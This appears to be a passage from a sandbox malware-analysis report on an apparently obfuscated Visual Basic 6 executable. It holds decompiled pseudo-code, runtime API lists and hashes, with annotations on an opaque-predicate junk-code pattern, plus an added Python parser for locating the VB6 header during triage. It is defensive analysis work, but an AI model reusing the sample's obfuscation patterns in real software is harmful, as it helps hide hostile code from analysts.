            				_t520 =  *((intOrPtr*)( *_v248 + 0x88))(_v248,  &_v200, _t516,  *((intOrPtr*)(_t697 + 0x310))( *_v332));
            				asm("fclex");
            				_v252 = _t520;
            				if(_v252 >= 0) {
            					_t142 =  &_v336;
            					 *_t142 = _v336 & 0x00000000;
            					__eflags =  *_t142;
            				} else {
            					_push(0x88);
            					_push(0x401d24);
            					_push(_v248);
            					_push(_v252);
            					L00401280();
            					_v336 = _t520;
            				}
            				_v204 =  *0x4010f0;
            				_v288 = _v100;
            				_v100 = _v100 & 0x00000000;
            				_v112 = _v288;
            				_v120 = 9;
            				 *_t758 = _v200;
            				 *_t758 =  *0x4010e8;
            				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v120, _t697, _t697,  &_v204, _t697);
            				_push( &_v104);
            				_push( &_v96);
            				_push(2);
            				L00401262();
            				_t759 =  &(_t758[3]);
            				L0040125C();
            				if( *0x40d010 != 0) {
            					_v340 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v340 = 0x40d010;
            				}
            				_t533 =  &_v96;
            				L0040128C();
            				_v240 = _t533;
            				_t537 =  *((intOrPtr*)( *_v240 + 0x170))(_v240,  &_v92, _t533,  *((intOrPtr*)( *((intOrPtr*)( *_v340)) + 0x30c))( *_v340));
            				asm("fclex");
            				_v244 = _t537;
            				if(_v244 >= 0) {
            					_t177 =  &_v344;
            					 *_t177 = _v344 & 0x00000000;
            					__eflags =  *_t177;
            				} else {
            					_push(0x170);
            					_push(0x401d34);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v344 = _t537;
            				}
            				_v292 = _v92;
            				_v92 = _v92 & 0x00000000;
            				_v112 = _v292;
            				_v120 = 8;
            				_v220 = 0xc96ed9a0;
            				_v216 = 0x5b01;
            				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v220, 0x7cbc2ca0, 0x5afe,  &_v120,  &_v136);
            				L00401256();
            				L0040126E();
            				L0040125C();
            				_t549 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v200);
            				_v240 = _t549;
            				if(_v240 >= 0) {
            					_t207 =  &_v348;
            					 *_t207 = _v348 & 0x00000000;
            					__eflags =  *_t207;
            				} else {
            					_push(0x6f8);
            					_push(0x401b58);
            					_push(_a4);
            					_push(_v240);
            					L00401280();
            					_v348 = _t549;
            				}
            				_v88 = _v200;
            				if( *0x40d010 != 0) {
            					_v352 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v352 = 0x40d010;
            				}
            				_t554 =  &_v96;
            				L0040128C();
            				_v240 = _t554;
            				_t558 =  *((intOrPtr*)( *_v240 + 0x50))(_v240,  &_v192, _t554,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x310))( *_v352));
            				asm("fclex");
            				_v244 = _t558;
            				if(_v244 >= 0) {
            					_t227 =  &_v356;
            					 *_t227 = _v356 & 0x00000000;
            					__eflags =  *_t227;
            				} else {
            					_push(0x50);
            					_push(0x401d24);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v356 = _t558;
            				}
            				if( *0x40d010 != 0) {
            					_v360 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v360 = 0x40d010;
            				}
            				_t562 =  &_v100;
            				L0040128C();
            				_v248 = _t562;
            				_t566 =  *((intOrPtr*)( *_v248 + 0x78))(_v248,  &_v200, _t562,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x30c))( *_v360));
            				asm("fclex");
            				_v252 = _t566;
            				if(_v252 >= 0) {
            					_t245 =  &_v364;
            					 *_t245 = _v364 & 0x00000000;
            					__eflags =  *_t245;
            				} else {
            					_push(0x78);
            					_push(0x401d34);
            					_push(_v248);
            					_push(_v252);
            					L00401280();
            					_v364 = _t566;
            				}
            				_v204 = _v200;
            				 *((intOrPtr*)( *_a4 + 0x718))(_a4, _v192,  &_v204,  &_v196);
            				_v60 = _v196;
            				_push( &_v100);
            				_push( &_v96);
            				_push(2);
            				L00401262();
            				_t760 =  &(_t759[3]);
            				if( *0x40d010 != 0) {
            					_v368 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v368 = 0x40d010;
            				}
            				_t713 =  *((intOrPtr*)( *_v368));
            				_t578 =  &_v96;
            				L0040128C();
            				_v240 = _t578;
            				_t582 =  *((intOrPtr*)( *_v240 + 0x68))(_v240,  &_v200, _t578,  *((intOrPtr*)(_t713 + 0x30c))( *_v368));
            				asm("fclex");
            				_v244 = _t582;
            				if(_v244 >= 0) {
            					_t275 =  &_v372;
            					 *_t275 = _v372 & 0x00000000;
            					__eflags =  *_t275;
            				} else {
            					_push(0x68);
            					_push(0x401d34);
            					_push(_v240);
            					_push(_v244);
            					L00401280();
            					_v372 = _t582;
            				}
            				_v220 =  *0x4010e0;
            				_v296 = _v200;
            				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v220, _t713,  &_v228);
            				_v84 = _v228;
            				L0040126E();
            				_t590 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
            				asm("fclex");
            				_v240 = _t590;
            				if(_v240 >= 0) {
            					_t295 =  &_v376;
            					 *_t295 = _v376 & 0x00000000;
            					__eflags =  *_t295;
            				} else {
            					_push(0x2b4);
            					_push(0x401b28);
            					_push(_a4);
            					_push(_v240);
            					L00401280();
            					_v376 = _t590;
            				}
            				_v272 = 0x5ae61;
            				_v268 = 1;
            				_v32 = _v32 & 0x00000000;
            				while(_v32 <= _v272) {
            					if( *0x40d010 != 0) {
            						_v380 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v380 = 0x40d010;
            					}
            					_t597 =  &_v96;
            					L0040128C();
            					_v240 = _t597;
            					_t601 =  *((intOrPtr*)( *_v240 + 0x218))(_v240,  &_v92, _t597,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x308))( *_v380));
            					asm("fclex");
            					_v244 = _t601;
            					if(_v244 >= 0) {
            						_t322 =  &_v384;
            						 *_t322 = _v384 & 0x00000000;
            						__eflags =  *_t322;
            					} else {
            						_push(0x218);
            						_push(0x401d44);
            						_push(_v240);
            						_push(_v244);
            						L00401280();
            						_v384 = _t601;
            					}
            					if( *0x40d010 != 0) {
            						_v388 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v388 = 0x40d010;
            					}
            					_t605 =  &_v100;
            					L0040128C();
            					_v248 = _t605;
            					_t609 =  *((intOrPtr*)( *_v248 + 0x138))(_v248,  &_v200, _t605,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x30c))( *_v388));
            					asm("fclex");
            					_v252 = _t609;
            					if(_v252 >= 0) {
            						_t340 =  &_v392;
            						 *_t340 = _v392 & 0x00000000;
            						__eflags =  *_t340;
            					} else {
            						_push(0x138);
            						_push(0x401d34);
            						_push(_v248);
            						_push(_v252);
            						L00401280();
            						_v392 = _t609;
            					}
            					if( *0x40d010 != 0) {
            						_v396 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v396 = 0x40d010;
            					}
            					_t726 =  *((intOrPtr*)( *_v396));
            					_t613 =  &_v104;
            					L0040128C();
            					_v256 = _t613;
            					_t617 =  *((intOrPtr*)( *_v256 + 0x188))(_v256,  &_v204, _t613,  *((intOrPtr*)(_t726 + 0x300))( *_v396));
            					asm("fclex");
            					_v260 = _t617;
            					if(_v260 >= 0) {
            						_t358 =  &_v400;
            						 *_t358 = _v400 & 0x00000000;
            						__eflags =  *_t358;
            					} else {
            						_push(0x188);
            						_push(0x401d14);
            						_push(_v256);
            						_push(_v260);
            						L00401280();
            						_v400 = _t617;
            					}
            					_v164 = _v200;
            					_v172 = 3;
            					_v296 = _v92;
            					_v92 = _v92 & 0x00000000;
            					_v112 = _v296;
            					_v120 = 8;
            					_v208 = 0x8227e0;
            					_v384 =  *0x4010d8;
            					L00401190();
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					L00401190();
            					_t750 =  &_v120;
            					_t745 = _t760;
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					_t627 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v208, 0x10, 0x10, _t726, _t726, _v204,  &_v212);
            					_v264 = _t627;
            					if(_v264 >= 0) {
            						_t384 =  &_v404;
            						 *_t384 = _v404 & 0x00000000;
            						__eflags =  *_t384;
            					} else {
            						_push(0x6fc);
            						_push(0x401b58);
            						_push(_a4);
            						_push(_v264);
            						L00401280();
            						_v404 = _t627;
            					}
            					_v28 = _v212;
            					_push( &_v104);
            					_push( &_v100);
            					_push( &_v96);
            					_push(3);
            					L00401262();
            					_t760 =  &(_t760[4]);
            					L0040125C();
            					if( *0x40d010 != 0) {
            						_v408 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v408 = 0x40d010;
            					}
            					_t730 =  *((intOrPtr*)( *_v408));
            					_t634 =  &_v96;
            					L0040128C();
            					_v240 = _t634;
            					_t638 =  *((intOrPtr*)( *_v240 + 0x70))(_v240,  &_v200, _t634,  *((intOrPtr*)(_t730 + 0x310))( *_v408));
            					asm("fclex");
            					_v244 = _t638;
            					if(_v244 >= 0) {
            						_t408 =  &_v412;
            						 *_t408 = _v412 & 0x00000000;
            						__eflags =  *_t408;
            					} else {
            						_push(0x70);
            						_push(0x401d24);
            						_push(_v240);
            						_push(_v244);
            						L00401280();
            						_v412 = _t638;
            					}
            					_v228 =  *0x4010d0;
            					_v220 = 0x445fc8f0;
            					_v216 = 0x5af7;
            					 *_t760 = _v200;
            					_t643 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v220, _t730,  &_v228, 0xf6292);
            					_v248 = _t643;
            					if(_v248 >= 0) {
            						_t424 =  &_v416;
            						 *_t424 = _v416 & 0x00000000;
            						__eflags =  *_t424;
            					} else {
            						_push(0x700);
            						_push(0x401b58);
            						_push(_a4);
            						_push(_v248);
            						L00401280();
            						_v416 = _t643;
            					}
            					_t731 =  &_v96;
            					L0040126E();
            					_v228 = 0xde5a6cd0;
            					_v224 = 0x5af7;
            					_v220 = 0xc72725d0;
            					_v216 = 0x5afc;
            					_t649 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v220,  &_v228,  &_v236);
            					_v240 = _t649;
            					if(_v240 >= 0) {
            						_t442 =  &_v420;
            						 *_t442 = _v420 & 0x00000000;
            						__eflags =  *_t442;
            					} else {
            						_push(0x704);
            						_push(0x401b58);
            						_push(_a4);
            						_push(_v240);
            						L00401280();
            						_v420 = _t649;
            					}
            					_v40 = _v236;
            					_v36 = _v232;
            					_t653 = _v32 + _v268;
            					if(_t653 < 0) {
            						L0040124A();
            						_push(_t754);
            						_push(_t731);
            						_push(_t731);
            						_push(0x401196);
            						_push( *[fs:0x0]);
            						 *[fs:0x0] = _t760;
            						_t655 = 0x28;
            						L00401190();
            						_push(_t685);
            						_push(_t750);
            						_push(_t745);
            						_v460 = _t760;
            						_v456 = 0x401110;
            						L00401244();
            						asm("fldz");
            						L00401214();
            						L0040123E();
            						asm("fcomp qword [0x401108]");
            						asm("fnstsw ax");
            						asm("sahf");
            						if(__eflags != 0) {
            							__eflags =  *0x40d33c;
            							if( *0x40d33c != 0) {
            								_v60 = 0x40d33c;
            							} else {
            								_push(0x40d33c);
            								_push(0x401d04);
            								L00401286();
            								_v60 = 0x40d33c;
            							}
            							_t657 =  *_v60;
            							_v48 = _t657;
            							L00401238();
            							_t658 =  &_v44;
            							L0040128C();
            							_t655 =  *((intOrPtr*)( *_v48 + 0x40))(_v48, _t658, _t658, _t657, _v32, 0x401d6c, L"Filmbyer");
            							asm("fclex");
            							_v52 = _t655;
            							__eflags = _v52;
            							if(_v52 >= 0) {
            								_t468 =  &_v64;
            								 *_t468 = _v64 & 0x00000000;
            								__eflags =  *_t468;
            							} else {
            								_push(0x40);
            								_push(0x401cf4);
            								_push(_v48);
            								_push(_v52);
            								L00401280();
            								_v64 = _t655;
            							}
            							L0040126E();
            						}
            						asm("wait");
            						_push(0x40b833);
            						L00401268();
            						L0040126E();
            						return _t655;
            					} else {
            						_v32 = _t653;
            						continue;
            					}
            					L113:
            				}
            				 *((intOrPtr*)(0x278260 + _v312))(0x19129e);
            				_push(0x40b714);
            				_t593 =  &_v56;
            				_push(_t593);
            				_push(0);
            				L00401250();
            				L0040125C();
            				return _t593;
            				goto L113;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040A822
            • __vbaVarDup.MSVBVM60 ref: 0040A86E
            • #544.MSVBVM60(?,?), ref: 0040A87E
            • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040A8A5
            • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040A8BE
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,00401196), ref: 0040A8E8
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040A921
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401CD4,00000108), ref: 0040A96B
            • __vbaNew2.MSVBVM60(00401D04,0040D33C), ref: 0040A992
            • __vbaChkstk.MSVBVM60(?), ref: 0040A9F6
            • __vbaChkstk.MSVBVM60(?), ref: 0040AA07
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401CF4,00000038), ref: 0040AA4D
            • __vbaVar2Vec.MSVBVM60(?,?), ref: 0040AA6F
            • __vbaAryMove.MSVBVM60(?,?,?,?), ref: 0040AA7F
            • __vbaFreeObj.MSVBVM60(?,?,?,?), ref: 0040AA87
            • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?), ref: 0040AA99
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,00401196), ref: 0040AAB4
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AAED
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D14,00000158), ref: 0040AB37
            • __vbaFreeStr.MSVBVM60 ref: 0040AB99
            • __vbaFreeObj.MSVBVM60 ref: 0040ABA1
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040ABB9
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ABF2
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D14,000000F8), ref: 0040AC3C
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040AC63
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AC9C
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,00000088), ref: 0040ACE9
            • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?), ref: 0040AD5E
            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00401196), ref: 0040AD69
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,?,00401196), ref: 0040AD81
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ADBA
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D34,00000170), ref: 0040AE04
            • __vbaVarMove.MSVBVM60 ref: 0040AE7C
            • __vbaFreeObj.MSVBVM60 ref: 0040AE84
            • __vbaFreeVar.MSVBVM60 ref: 0040AE8C
            • __vbaHresultCheckObj.MSVBVM60(00000000,004010F8,00401B58,000006F8), ref: 0040AEC8
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040AEF8
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AF31
            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00401D24,00000050), ref: 0040AF78
            • __vbaNew2.MSVBVM60(00401F3C,0040D010), ref: 0040AF9F
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040AFD8
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D34,00000078), ref: 0040B01F
            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040B076
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,?,?,?,?,00401196), ref: 0040B091
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040B0CA
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D34,00000068), ref: 0040B111
            • __vbaFreeObj.MSVBVM60(?,?), ref: 0040B163
            • __vbaHresultCheckObj.MSVBVM60(00000000,004010F8,00401B28,000002B4,?,?), ref: 0040B19A
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?), ref: 0040B1FC
            • __vbaObjSet.MSVBVM60(?,00000000,?,?), ref: 0040B235
            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00401D44,00000218,?,?), ref: 0040B27F
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?), ref: 0040B2A6
            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?), ref: 0040B2DF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$CheckHresult$FreeNew2$List$Chkstk$Move$#544Var2
            • String ID: 19:19:19
            • API String ID: 2805188520-362381601
            • Opcode ID: 6f566cfc70f49276470e9b968ba880d1b1bf0dc2c54e276861422a4307737c41
            • Instruction ID: f700f2df218265fe33c11daf620e59fa074f887f4030a56d6d31b81c7efa711d
            • Opcode Fuzzy Hash: 6f566cfc70f49276470e9b968ba880d1b1bf0dc2c54e276861422a4307737c41
            • Instruction Fuzzy Hash: 4B92E474940219DFDB20DF90CC49BDDB7B8BB08304F1085EAE509BB2A1DB795A89DF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
            				intOrPtr* _t12;
            				signed int _t13;
            				intOrPtr _t26;
            				void* _t29;
            
            				_push("VB5!6&*"); // executed: pushes the address of the VB5/VB6 EXE header (magic "VB5!", runtime build word 0x2636 = "6&", LangDLL "*")
            				L004012BC(); // executed: import thunk for MSVBVM60.#100 (ThunRTMain); the runtime never returns here, so everything below is data the decompiler has decoded as code
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax ^ __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				 *__eax =  *__eax + __eax;
            				asm("popfd");
            				_t12 =  *0xe42f2c80 + 0x37;
            				asm("adc byte [eax], 0x5a");
            				 *_t12 =  *_t12 + _t12;
            				 *__ecx =  *__ecx + _t12;
            				 *_t12 =  *_t12 + _t12;
            				 *_t12 =  *_t12 + __ecx;
            				_t13 = _t12 + 1;
            				 *__ecx =  *__ecx + 0x41;
            				asm("o16 insb");
            				asm("outsb");
            				 *((intOrPtr*)(__esi + 0x2fb)) =  *((intOrPtr*)(__esi + 0x2fb)) + __edx;
            				 *_t13 =  *_t13 + _t13;
            				 *_t13 =  *_t13 ^ _t13;
            				es = es;
            				_pop(_t26);
            				asm("repe retf 0x9645");
            				 *((intOrPtr*)(_t29 - 0x42)) = _t26;
            				_pop(es);
            				asm("adc al, 0x8");
            				 *(_t29 - 0x6654b720) =  *(_t29 - 0x6654b720) | __eax;
            				asm("clts");
            				asm("clc");
            				return __eax;
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: #100
            • String ID: VB5!6&*
            • API String ID: 1341478452-3593831657
            • Opcode ID: 9f77ca96e00d6d196541f6dca017c27859c3ca10416ee231201f9083c15afad8
            • Instruction ID: 7141749032a25ed65dec8f7528695c4b35daec877f43c10614dbc24388ec7a7a
            • Opcode Fuzzy Hash: 9f77ca96e00d6d196541f6dca017c27859c3ca10416ee231201f9083c15afad8
            • Instruction Fuzzy Hash: 16F0986254E3C11FD30357349C21A823FB1AE43264B1B80EBC0D5DF1F3D229494AC762
            Uniqueness

            Uniqueness Score: -1.00%

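            The entry function above is the standard VB6 stub (push pointer to the VB5! header, call ThunRTMain), so the pushed pointer, not the entry point, is where static triage of such a sample starts. The following parser is an added example and is not part of the Joe Sandbox report or of the analysed file: it recognises the push/call stub, follows the pushed pointer to the VB5/VB6 header, reconstructs the "VB5!6&*" string the report shows (magic + runtime build 0x2636 + LangDLL), and resolves the header-relative project name offsets. The field order is the widely published VB5/VB6 header layout; IMAGE_BASE = 0x400000 is an assumption matching the dump offset in the report, and the in-memory image built by build_sample_image() is constructed for the demonstration (entry and thunk addresses mirror the report's layout, the header and project strings are invented).

```python
"""Added example: locate and parse the VB5/VB6 header that a ThunRTMain entry stub pushes.

A VB6 executable starts with a two-instruction stub:
    68 <imm32>   push offset VBHeader
    E8 <rel32>   call ThunRTMain          (MSVBVM60 ordinal #100)
The pushed pointer addresses a structure that begins with "VB5!". The report's
"VB5!6&*" is that magic followed by the runtime build word 0x2636 ("6&") and a
LangDLL field of "*". Nothing here is taken from the analysed file.
"""
import struct

IMAGE_BASE = 0x400000  # assumption: same preferred base as the report's dump (Offset: 00400000)

VB_HEADER_FMT = "<4sH14s14sHIIIIIIIIHHIIIIIIII"
VB_HEADER_SIZE = struct.calcsize(VB_HEADER_FMT)  # 0x68 bytes
VB_HEADER_FIELDS = (
    "magic", "runtime_build", "lang_dll", "sec_lang_dll", "runtime_rev",
    "lcid", "sec_lcid", "sub_main", "project_info", "mdl_int_ctls",
    "mdl_int_ctls2", "thread_flags", "thread_count", "form_count",
    "external_count", "thunk_count", "gui_table", "external_table",
    "com_register_data", "proj_description", "proj_exe_name",
    "proj_help_file", "proj_name",
)


def find_vb_stub(image, entry_rva):
    """Return (header_va, thunk_va) if the entry point is `push imm32; call rel32`, else None."""
    stub = bytes(image[entry_rva:entry_rva + 10])
    if len(stub) < 10 or stub[0] != 0x68 or stub[5] != 0xE8:
        return None
    header_va = struct.unpack_from("<I", stub, 1)[0]
    rel = struct.unpack_from("<i", stub, 6)[0]
    thunk_va = IMAGE_BASE + entry_rva + 10 + rel  # call target = VA of next instruction + rel32
    return header_va, thunk_va


def _cstring(image, off):
    end = image.index(b"\0", off)
    return bytes(image[off:end]).decode("latin-1")


def parse_vb_header(image, header_va):
    """Unpack the header at header_va and resolve its header-relative name offsets."""
    off = header_va - IMAGE_BASE
    raw = struct.unpack_from(VB_HEADER_FMT, image, off)
    hdr = dict(zip(VB_HEADER_FIELDS, raw))
    if hdr["magic"] != b"VB5!":
        raise ValueError("pushed pointer does not address a VB5!/VB6 header")
    # The string a disassembler shows is magic + build word + LangDLL up to its NUL.
    lang = hdr["lang_dll"].split(b"\0", 1)[0]
    hdr["signature"] = (hdr["magic"] + struct.pack("<H", hdr["runtime_build"]) + lang).decode("latin-1")
    # bSZ* fields are offsets relative to the header start; 0 means "no string".
    for key in ("proj_description", "proj_exe_name", "proj_help_file", "proj_name"):
        hdr[key + "_str"] = _cstring(image, off + hdr[key]) if hdr[key] else ""
    return hdr


def summarize(image, entry_rva):
    """Triage view of a VB6 binary: where the runtime will start executing VB code."""
    found = find_vb_stub(image, entry_rva)
    if found is None:
        return None
    header_va, thunk_va = found
    hdr = parse_vb_header(image, header_va)
    return {
        "signature": hdr["signature"],
        "thunk_va": thunk_va,          # import thunk for ThunRTMain
        "sub_main": hdr["sub_main"],   # 0: no Sub Main, a form is the startup object
        "project_info": hdr["project_info"],
        "form_count": hdr["form_count"],
        "exe_name": hdr["proj_exe_name_str"],
        "project_name": hdr["proj_name_str"],
    }


def build_sample_image():
    """Constructed in-memory image (not the sample's bytes) holding a VB6 stub and header."""
    image = bytearray(0x3000)
    entry_rva, thunk_rva, header_rva = 0x12C4, 0x12BC, 0x2000  # entry/thunk mirror the report; header location invented
    image[entry_rva:entry_rva + 10] = (
        b"\x68" + struct.pack("<I", IMAGE_BASE + header_rva)
        + b"\xE8" + struct.pack("<i", thunk_rva - (entry_rva + 10))
    )
    hdr = struct.pack(
        VB_HEADER_FMT, b"VB5!", 0x2636, b"*", b"", 0, 0x409, 0x409,
        0,                      # sub_main: none, a form is the startup object
        IMAGE_BASE + 0x2100,    # project_info
        0, 0, 1, 1, 1, 0, 0,    # ctls flags, thread flags/count, 1 form, 0 externals, 0 thunks
        IMAGE_BASE + 0x2200, 0, 0,
        0, 0x68, 0, 0x78,       # only exe name and project name are present
    )
    image[header_rva:header_rva + VB_HEADER_SIZE] = hdr
    image[header_rva + 0x68:header_rva + 0x71] = b"Demo.exe\0"
    image[header_rva + 0x78:header_rva + 0x7D] = b"Demo\0"
    return image


if __name__ == "__main__":
    print(summarize(build_sample_image(), 0x12C4))
```

            On a real file, map the sections to their virtual addresses first (or run against a process dump like the one the report is based on) and pass the entry point RVA from the PE optional header; sub_main and project_info are the two pointers that lead to the actual VB code, which is why the stub-decoded garbage after the ThunRTMain call can be ignored.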
            Non-executed Functions

            C-Code - Quality: 58%
            			E0040B738(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a8) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				void* _v24;
            				intOrPtr _v28;
            				char _v40;
            				intOrPtr* _v44;
            				signed int _v48;
            				intOrPtr* _v56;
            				signed int _v60;
            				signed int _t25;
            				intOrPtr* _t27;
            				char* _t28;
            				intOrPtr _t42;
            
            				_push(0x401196);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t42;
            				_t25 = 0x28;
            				L00401190(); // __vbaChkstk
            				_v12 = _t42;
            				_v8 = 0x401110;
            				L00401244(); // __vbaStrCopy
            				asm("fldz");
            				L00401214(); // _CItan: Tan(0.0)
            				L0040123E(); // __vbaFpR8
            				asm("fcomp qword [0x401108]"); // compare Tan(0.0) against a double constant at 0x401108
            				asm("fnstsw ax");
            				asm("sahf");
            				if(__eflags != 0) { // result never depends on input: opaque predicate (junk code) around the object code below
            					if( *0x40d33c != 0) {
            						_v56 = 0x40d33c;
            					} else {
            						_push(0x40d33c);
            						_push(0x401d04);
            						L00401286();
            						_v56 = 0x40d33c;
            					}
            					_t27 =  *_v56;
            					_v44 = _t27;
            					L00401238(); // __vbaCastObj(..., 0x401d6c, L"Filmbyer")
            					_t28 =  &_v40;
            					L0040128C(); // __vbaObjSet
            					_t25 =  *((intOrPtr*)( *_v44 + 0x40))(_v44, _t28, _t28, _t27, _v28, 0x401d6c, L"Filmbyer"); // COM vtable call through slot +0x40; HRESULT checked by __vbaHresultCheckObj below
            					asm("fclex");
            					_v48 = _t25;
            					if(_v48 >= 0) {
            						_t19 =  &_v60;
            						 *_t19 = _v60 & 0x00000000;
            						__eflags =  *_t19;
            					} else {
            						_push(0x40);
            						_push(0x401cf4);
            						_push(_v44);
            						_push(_v48);
            						L00401280();
            						_v60 = _t25;
            					}
            					L0040126E();
            				}
            				asm("wait");
            				_push(0x40b833);
            				L00401268();
            				L0040126E();
            				return _t25;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040B753
            • __vbaStrCopy.MSVBVM60(?,?,?,?,00401196), ref: 0040B76B
            • _CItan.MSVBVM60(?,?,?,?,00401196), ref: 0040B772
            • __vbaFpR8.MSVBVM60(?,?,?,?,00401196), ref: 0040B777
            • __vbaNew2.MSVBVM60(00401D04,0040D33C,?,?,?,?,00401196), ref: 0040B79E
            • __vbaCastObj.MSVBVM60(?,00401D6C,Filmbyer,?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B7C8
            • __vbaObjSet.MSVBVM60(?,00000000,?,00401D6C,Filmbyer,?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B7D2
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401CF4,00000040,?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B7FB
            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401196), ref: 0040B80C
            • __vbaFreeStr.MSVBVM60(0040B833,?,?,?,?,00401196), ref: 0040B825
            • __vbaFreeObj.MSVBVM60(0040B833,?,?,?,?,00401196), ref: 0040B82D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$Free$CastCheckChkstkCopyHresultItanNew2
            • String ID: Filmbyer
            • API String ID: 2758753910-3873735245
            • Opcode ID: 061b70053eedfe6ecd37eba7337b8fa1b2feadb4be956d3c05b53dc7e878791f
            • Instruction ID: 60b8d970ed1fa1a4995066ccab8966c221011f2224f6861e81e562bea0aaf7cc
            • Opcode Fuzzy Hash: 061b70053eedfe6ecd37eba7337b8fa1b2feadb4be956d3c05b53dc7e878791f
            • Instruction Fuzzy Hash: 94210771941208AFCB00EBA5C946BEEBBB8EF18714F20847AF501B61F1D77859448BAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
